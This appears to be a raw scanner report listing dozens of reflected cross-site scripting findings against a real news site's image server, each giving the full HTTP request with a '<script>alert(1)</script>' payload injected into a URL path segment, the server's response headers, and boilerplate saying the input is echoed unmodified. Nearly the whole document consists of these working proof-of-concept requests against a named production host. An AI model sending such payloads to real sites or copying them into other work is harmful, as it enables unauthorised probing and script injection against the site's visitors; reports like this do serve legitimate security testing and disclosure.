GET /img/2010/11/06c24fd<script>alert(1)</script>bbe8664d2ba/170x128-alg_conan_obrien_portrait.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:06 GMT Server: Apache Content-Length: 111 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6ec7<script>alert(1)</script>0029ec24528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgb6ec7<script>alert(1)</script>0029ec24528/2010/11/07/110x83-alg_ernest_codelia.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:03 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce7d<script>alert(1)</script>5674bc6d5ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010bce7d<script>alert(1)</script>5674bc6d5ed/11/07/110x83-alg_ernest_codelia.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:29 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1d8e<script>alert(1)</script>ab7df113cde was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11a1d8e<script>alert(1)</script>ab7df113cde/07/110x83-alg_ernest_codelia.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:13 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8271c<script>alert(1)</script>6e53fd0a9b6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/078271c<script>alert(1)</script>6e53fd0a9b6/110x83-alg_ernest_codelia.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:17 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5171c<script>alert(1)</script>8168e251ddf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img5171c<script>alert(1)</script>8168e251ddf/2010/11/07/170x128-alg_greenpoint_eckford_eyesore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:06 GMT Server: Apache Content-Length: 116 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da181<script>alert(1)</script>a3888e404d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010da181<script>alert(1)</script>a3888e404d9/11/07/170x128-alg_greenpoint_eckford_eyesore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:07 GMT Server: Apache Content-Length: 116 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 36ca2<script>alert(1)</script>61eaca4bad5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/1136ca2<script>alert(1)</script>61eaca4bad5/07/170x128-alg_greenpoint_eckford_eyesore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:19 GMT Server: Apache Content-Length: 116 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c208d<script>alert(1)</script>b33771f40b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/07c208d<script>alert(1)</script>b33771f40b4/170x128-alg_greenpoint_eckford_eyesore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:47 GMT Server: Apache Content-Length: 116 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9042f<script>alert(1)</script>e4695780546 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img9042f<script>alert(1)</script>e4695780546/2010/11/07/90x90-alg_bloomberg_china.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:03 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 51a03<script>alert(1)</script>195743084d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201051a03<script>alert(1)</script>195743084d7/11/07/90x90-alg_bloomberg_china.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:12 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 320b9<script>alert(1)</script>478148e0dab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11320b9<script>alert(1)</script>478148e0dab/07/90x90-alg_bloomberg_china.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:40 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf497<script>alert(1)</script>22ca5fb75c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/07bf497<script>alert(1)</script>22ca5fb75c6/90x90-alg_bloomberg_china.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:26 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b9186<script>alert(1)</script>3d9c25aa411 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgb9186<script>alert(1)</script>3d9c25aa411/2010/11/07/90x90-alg_jim_boehner_speaks.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:02 GMT Server: Apache Content-Length: 108 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a9d6<script>alert(1)</script>76149a5e4c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20108a9d6<script>alert(1)</script>76149a5e4c6/11/07/90x90-alg_jim_boehner_speaks.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:08 GMT Server: Apache Content-Length: 108 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3fce3<script>alert(1)</script>9d94c561af7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/113fce3<script>alert(1)</script>9d94c561af7/07/90x90-alg_jim_boehner_speaks.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:11 GMT Server: Apache Content-Length: 108 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4926<script>alert(1)</script>f7a6bb3dbe7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/07b4926<script>alert(1)</script>f7a6bb3dbe7/90x90-alg_jim_boehner_speaks.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:41 GMT Server: Apache Content-Length: 108 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddee1<script>alert(1)</script>75b08c3c54b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgddee1<script>alert(1)</script>75b08c3c54b/2010/11/07/90x90-alg_lily_allen.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:07 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 75c20<script>alert(1)</script>a6cc83bb50d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201075c20<script>alert(1)</script>a6cc83bb50d/11/07/90x90-alg_lily_allen.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:13 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d14cf<script>alert(1)</script>e50c744bc6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11d14cf<script>alert(1)</script>e50c744bc6c/07/90x90-alg_lily_allen.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:14 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0fd2<script>alert(1)</script>2fbd1e4003e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/07f0fd2<script>alert(1)</script>2fbd1e4003e/90x90-alg_lily_allen.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:44 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 661e6<script>alert(1)</script>4b0bf51eb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img661e6<script>alert(1)</script>4b0bf51eb5/2010/11/08/110x83-alg_nyc_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:06 GMT Server: Apache Content-Length: 101 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82563<script>alert(1)</script>1d57fb2533f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201082563<script>alert(1)</script>1d57fb2533f/11/08/110x83-alg_nyc_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:07 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1649<script>alert(1)</script>01e0a6842f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11b1649<script>alert(1)</script>01e0a6842f0/08/110x83-alg_nyc_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:13 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a5886<script>alert(1)</script>fb4ed92cc94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/08a5886<script>alert(1)</script>fb4ed92cc94/110x83-alg_nyc_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:36 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f7d7f<script>alert(1)</script>03258cc5e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgf7d7f<script>alert(1)</script>03258cc5e07/2010/11/08/110x83-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:37 GMT Server: Apache Content-Length: 121 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b448<script>alert(1)</script>c7b43d0b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20102b448<script>alert(1)</script>c7b43d0b6/11/08/110x83-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:58 GMT Server: Apache Content-Length: 119 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 954f0<script>alert(1)</script>318c7a72320 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11954f0<script>alert(1)</script>318c7a72320/08/110x83-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:09:39 GMT Server: Apache Content-Length: 121 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ade58<script>alert(1)</script>e62aef2f8bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/08ade58<script>alert(1)</script>e62aef2f8bc/110x83-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:10:40 GMT Server: Apache Content-Length: 121 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5289<script>alert(1)</script>54c6768d611 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgc5289<script>alert(1)</script>54c6768d611/2010/11/08/110x83-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:24 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46d7b<script>alert(1)</script>812d22edb1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201046d7b<script>alert(1)</script>812d22edb1a/11/08/110x83-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:06 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a43b5<script>alert(1)</script>0e001eb128e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11a43b5<script>alert(1)</script>0e001eb128e/08/110x83-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:32 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41a06<script>alert(1)</script>7d0dd29cd30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/0841a06<script>alert(1)</script>7d0dd29cd30/110x83-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:13 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b431<script>alert(1)</script>81836b354cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img8b431<script>alert(1)</script>81836b354cf/2010/11/08/170x128-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:39 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13619<script>alert(1)</script>a6869fee104 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201013619<script>alert(1)</script>a6869fee104/11/08/170x128-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:38 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
